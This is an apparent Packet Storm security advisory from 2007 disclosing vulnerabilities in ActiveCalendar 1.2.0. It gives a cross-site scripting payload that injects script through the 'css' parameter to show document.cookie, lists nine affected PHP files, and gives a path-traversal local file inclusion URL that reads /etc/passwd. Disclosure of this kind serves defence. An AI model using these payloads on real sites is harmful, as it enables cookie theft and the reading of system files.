activecal120-multi.txt

2007-02-28T00:00:00
ID PACKETSTORM:54715
Type packetstorm
Reporter Simon Bonnard
Modified 2007-02-28T00:00:00

Description

                                        
                                            `ActiveCalendar 1.2.0, Multiple vulnerabilities  
Vendor site : http://www.micronetwork.de/activecalendar/  
Global risk : Critical  
  
Multiples XSS :  
---------------  
  
/activecalendar/data/[page].php?css="><script>alert(document.cookie)</script>  
  
In :  
  
/data/  
flatevents.php  
js.php  
mysqlevents.php  
m_2.php  
m_3.php  
m_4.php  
xmlevents.php  
y_2.php  
y_3.php  
  
  
Local File Include :  
---------------------  
  
/activecalendar/data/showcode.php?page=../../../../../../../../../../../../../../etc/passwd%00  
  
  
Regards,  
  
  
Simon Bonnard - 24/02/07 - 02:40am  
  
`